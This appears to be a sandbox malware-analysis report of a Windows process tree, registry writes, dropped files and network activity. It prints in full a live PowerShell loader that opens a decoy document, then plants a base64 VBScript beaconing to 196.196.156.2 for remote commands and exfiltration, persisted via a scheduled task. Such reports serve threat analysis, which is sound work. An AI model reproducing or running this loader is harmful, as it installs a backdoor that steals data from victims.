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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\623-6341-11.docx -value $fil -encoding byte;&$home\appdata\local\temp\623-6341-11.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgMTI7c3RhcnQtc2xlZXAgMTE7JGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE5Ni4xOTYuMTU2LjI6NTc4ODEvSGNLT0FoYVpnRGVQS0dLRi9wYWdlMjEzL3VwZ3JhZGUudHh0Jyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGJqZG8rPUlFWCAkamtyfG91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzE5Ni4xOTYuMTU2LjI6NDkyMTAvcGFnZTIxMycsJGRycHkpO30iDQpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6176 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "B4E6668E-F0C5-4C4E-B506-77C542E94D3A" "631EE3FF-056D-4747-A9E7-75CD83FC1613" "6488" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64. Version: 0.12.2.0 Modules
| |||||||||||||||
| 6488 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\appdata\local\temp\623-6341-11.docx" /o "" | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 16.0.16026.20146 Modules
| |||||||||||||||
| 6512 | "C:\WINDOWS\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f | C:\Windows\System32\schtasks.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6528 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6592 | "C:\WINDOWS\system32\taskmgr.exe" /4 | C:\Windows\System32\Taskmgr.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Manager Exit code: 3221226540 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7148 | "C:\WINDOWS\system32\taskmgr.exe" /4 | C:\Windows\System32\Taskmgr.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Manager Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5128) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids |
| Operation: | write | Name: | Word.Document.12 |
Value: | |||
| (PID) Process: | (5128) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
| Operation: | write | Name: | {5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF |
Value: 010000000000000073393329DA61DB01 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6488 |
| Operation: | write | Name: | 0 |
Value: 0B0E106AA3C770E9095B4CA449041E0060DA0223004698F995D9A2BBD8ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511D832D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | en-US |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | de-de |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | fr-fr |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | es-es |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | it-it |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ja-jp |
Value: 2 | |||
| (PID) Process: | (6488) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ko-kr |
Value: 2 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5128 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tr5devr0.bq5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5128 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uvzt1e4g.vcd.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5128 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\17ad093a9f5a0e2f.customDestinations-ms | binary | |
MD5:C5B3097B7CFBA46B8CE3855F496A1CE6 | SHA256:C9228A48D0DCD5F80E6C6A243F7DC8AF662542EB49DAED864F351D00D2374E7D | |||
| 5128 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U41BVVNBHKC7TDJ56KCH.temp | binary | |
MD5:C5B3097B7CFBA46B8CE3855F496A1CE6 | SHA256:C9228A48D0DCD5F80E6C6A243F7DC8AF662542EB49DAED864F351D00D2374E7D | |||
| 6488 | WINWORD.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | binary | |
MD5:61F6A655C20229B4746FA11B7FF55A9D | SHA256:ED4B185BAA177ADD91AD2308A53ADD4E6FC8E9E62DD3E2899F17B263098FA392 | |||
| 5128 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:998CFFB482CA2E7E65A918571A127A3F | SHA256:284FCBE8CD2CCED418E5C6DB1073B3BAC9BDB68E18990F25389CCBA288406F87 | |||
| 5128 | powershell.exe | C:\Users\admin\AppData\Local\Temp\623-6341-11.docx | document | |
MD5:0AB99DCA01C4E9D1DBEF15428371E69F | SHA256:F75F1D4C561FCB013E262B3667982759F215BA7E714C43474755B72ED7F9D01E | |||
| 6488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin | text | |
MD5:CC90D669144261B198DEAD45AA266572 | SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899 | |||
| 6488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary | |
MD5:393F9E2740EB73EF53C2C68E27251FF0 | SHA256:92AFB2FFDCCE7C5BA2BACE12B876FF04F075C34E5D6734A70EA3ACC9554FDEB1 | |||
| 6488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin | text | |
MD5:4CDFC5B4FC0729685DD760EA8A1137F8 | SHA256:B65AAAC1686DE87EB03469844D2EA2E6D88E4F73EC0E5ADB94FF87238A24B5B6 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl | unknown | — | — | whitelisted |
6488 | WINWORD.EXE | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 104.126.37.185:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1076 | svchost.exe | 23.35.238.131:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted |
1176 | svchost.exe | 20.190.160.14:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
officeclient.microsoft.com |
| unknown |
ecs.office.com |
| whitelisted |
Process | Message |
|---|---|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|